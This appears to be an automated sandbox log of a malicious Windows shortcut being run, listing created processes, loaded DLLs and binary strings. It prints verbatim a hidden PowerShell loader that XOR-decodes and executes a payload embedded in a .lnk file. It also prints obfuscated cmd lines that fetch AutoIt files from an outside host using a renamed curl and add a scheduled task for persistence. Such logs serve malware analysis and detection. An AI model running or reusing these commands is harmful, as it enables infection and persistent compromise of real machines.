    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTovJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
    Source: C:\Windows\System32\cmd.exeProcess created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: secur32.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: schannel.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: secur32.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: schannel.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: secur32.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: schannel.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: secur32.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: schannel.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
